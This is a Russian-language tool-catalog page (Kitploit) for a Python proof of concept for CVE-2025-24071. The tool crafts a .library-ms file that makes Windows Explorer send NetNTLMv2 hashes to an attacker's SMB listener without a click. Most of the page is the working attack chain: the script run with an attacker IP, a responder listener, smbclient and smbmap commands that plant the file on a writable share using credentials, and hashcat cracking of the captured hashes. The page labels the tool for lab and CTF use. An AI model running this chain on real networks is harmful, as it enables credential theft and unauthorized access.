Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2025-24071 — Python PoC для CVE-2025-24071, который создаёт файл .library-ms, чтобы заставить Windows Explorer раскрыть хеши NetNTLMv2 через SMB для перехвата и взлома. | Kitploit
Инструменты/GitHubGitHub/daemon-404/poc-cve-2025-24071
Атаки на ПаролиАнализ уязвимостейЭксплуатацияСетевая безопасностьCTFТестирование на ПроникновениеRed TeamingЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
daemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

Python PoC для CVE-2025-24071, который создаёт файл .library-ms, чтобы заставить Windows Explorer раскрыть хеши NetNTLMv2 через SMB для перехвата и взлома.

Репозиторий
13 ч 58 мин назадЕщё не проверено

❀ coerce-library

CVE-2025-24071 — принудительная NTLM-аутентификация через .library-ms (метод SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ Что это делает

Запрашивает ваш IP атакующего и имя файла, создаёт .library-ms, указывающий на \\<IP>\share, и упаковывает его в exploit.tar. Когда Explorer просматривает папку, в которую попадает отдельный .library-ms, он автоматически разрешает этот UNC-путь и передаёт NTLMv2 учётной записи на ваш слушатель — без единого клика.

⚠️ Срабатывает именно отдельный .library-ms — а не .tar. Файл .tar, лежащий на шаре, инертен; Explorer не разбирает tar-архивы. Вы должны разместить сам .library-ms на шаре как отдельный файл. Как это сделать, зависит от инструмента (см. ниже).


❀ Запуск

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Далее

1) Слушаем

root@kitploit:~
sudo responder -I tun0

2) Разместите .library-ms на доступной для записи шаре

smbclient — загрузите .tar, распакуйте его на стороне сервера командой tar x (рядом появится отдельный .library-ms):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — не имеет шага распаковки, поэтому загружайте отдельный .library-ms напрямую (загрузка .tar здесь ничего не даст — он не умеет его распаковывать):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Убедитесь, что он оказался на шаре как отдельный файл:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Взломайте перехваченный NTLMv2

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ только для авторизованного тестирования на проникновение / CTF / лабораторных условий ☧

Скачать инструмент